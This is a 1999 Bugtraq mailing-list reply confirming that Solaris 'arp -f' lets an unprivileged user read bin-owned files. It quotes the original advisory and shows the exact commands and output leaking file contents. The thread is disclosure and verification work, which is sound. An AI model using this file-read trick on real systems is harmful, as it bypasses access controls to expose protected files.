Bugtraq mailing list archives
Re: Solaris 2.x chkperm/arp vulnerabilities
From: lwcashd () BIW COM (Larry W. Cashdollar)
Date: Wed, 1 Dec 1999 14:18:53 -0500
Arp bug Verified for my Solaris 5.6 and 5.5.1 Installs. $ uname -a SunOS pangea 5.5.1 Generic_103640-26 sun4u sparc SUNW,Ultra-5_10 # uname -a SunOS vapid 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10 # $ ls -l /etc/bin -rw-rw---- 1 bin bin 23 Dec 1 13:54 /etc/bin On both machines I could read bin:bin owned files as a regular joe user with arp -f. bash-2.00$ /usr/sbin/arp -f /etc/bin arp: ze: unknown host arp: ze: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: ze: unknown host arp: zeperl: unknown host arp: bad line: zeperlizinzeliver As you can see arp will only print until the first white space or newline. # cat /etc/bin ze perl iz in ze liver ze perl iz in ze liver zeperliz in ze liver zeperliz in ze liver zeperliz in ze liver zeperliz in ze liver zeperliz in ze liver ze perl iz in ze liver zeperl iz in ze liver zeperlizinzeliver zeperl iz in ze liver ze perl iz in ze liver Brock wrote:
Greetings, OVERVIEW /usr/vmsys/bin/chkperm and /usr/sbin/arp can be used to read bin-owned files. BACKGROUND All my testing was done on Solaris 2.7 and 2.6 SPARC edition.
Vuln #2 - arp Just as the first, you may read any bin owned files: bash-2.02$ ls -la /etc/bin -rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin bash-2.02$ cat /etc/bin cat: cannot open /etc/bin bash-2.02$ /usr/sbin/arp -f /etc/bin arp: bad line: seekret1 arp: bad line: seekret2 arp: bad line: seekret3 arp: bad line: seekret4 arp: bad line: seekret5
Larry W. Cashdollar R2D2 r00t3d the death star. http://vapid.dhs.org
Current thread:
- Solaris 2.x chkperm/arp vulnerabilities Brock Tellier (Nov 30)
- <Possible follow-ups>
- Re: Solaris 2.x chkperm/arp vulnerabilities Larry W. Cashdollar (Dec 01)
- Re: Solaris 2.x chkperm/arp vulnerabilities Casper Dik (Dec 03)
- Re: Solaris 2.x chkperm/arp vulnerabilities Craig Ruefenacht (Dec 06)
- Re: Solaris 2.x chkperm/arp vulnerabilities Casper Dik (Dec 03)